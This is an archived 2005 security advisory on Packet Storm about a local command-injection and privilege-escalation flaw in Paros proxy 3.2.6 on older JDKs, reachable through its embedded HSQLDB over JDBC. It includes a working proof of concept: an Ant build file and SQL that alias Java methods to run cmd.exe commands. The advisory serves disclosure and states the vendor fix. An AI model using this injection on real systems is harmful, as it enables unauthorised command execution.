what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

parosproxy.txt

parosproxy.txt
Posted Nov 5, 2005
Authored by Marc Schoenefeld

There is a vulnerability with how JDK is used with Parosproxy that allows the JDBC to be used as an attack path.

tags | advisory
SHA-256 | 4f3fa44948cb97b0233e4284486e6b495f394d9dbae1b2fe29d244a601741407
Download | Favorite | View

parosproxy.txt

Change Mirror Download
Hello,

first word to say: Parosproxy is a great tool, it has helped
me a lot during pentesting. Unfortunately the JDK until version
1.4.2_08 is vulnerable in a way that allows to use JDBC as an attack path.
Parosproxy uses JDBC to persist some state data.

Concerning the release 3.2.6 of Parosproxy [www.parosproxy.org], there is a
minor problem when running it with JDK 1.4.2 until subrelease 08.
It can be used to trigger command injection in the embedded HSQLDB via the
JDBC (localhost on port 9001) by another (like unprivileged user with
lesser rights than the paros process) user on the machine. This
results in privilege escalation.

Demonstration files (see below) have been provided to 
contact@parosproxy.org.
A similar problem with HSQLDB has occured a while ago when exploiting 
former
version of JBoss [https://www.illegalaccess.org/java/jboss.php], you
will find further details there.

According to parosproxy.org this problem has been solved with Paros
version 3.2.7. Please update your old 3.2.6 or older version, it's good
and it's free !

Sincerely
Marc Schönefeld


=======build.xml==========
<project name="sql" default="exec">
<target name="exec">
<sql
    driver="org.hsqldb.jdbcDriver"
    url="jdbc:hsqldb:hsql://localhost:9001"
    userid="sa"
    password=""
    print="true">
    <fileset dir=".">
    <include name="*.sql"/>
    </fileset>
    <classpath>
        <pathelement location="lib.jar"/>
        </classpath>
    </sql>
    </target>
    </project>
=======build.xml==========

=======exec.sql==========
CREATE ALIAS COMPDEBUG FOR
"org.apache.xml.utils.synthetic.JavaUtils.setDebug" ;
CALL COMPDEBUG(true);
CREATE ALIAS SETPROP FOR "java.lang.System.setProperty";
CALL  SETPROP ('org.apache.xml.utils.synthetic.javac','cmd.exe') ;
CREATE ALIAS COMPILE FOR
"org.apache.xml.utils.synthetic.JavaUtils.JDKcompile" ;
CALL  COMPILE('a','/c "cmd.exe /c notepad.exe
c:\windows\system32\drivers\etc\hosts >" ') ;
CREATE ALIAS GETPROP FOR "java.lang.System.getProperty";
CALL GETPROP('org.apache.xml.utils.synthetic.javac') ;
=======exec.sql==========


Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close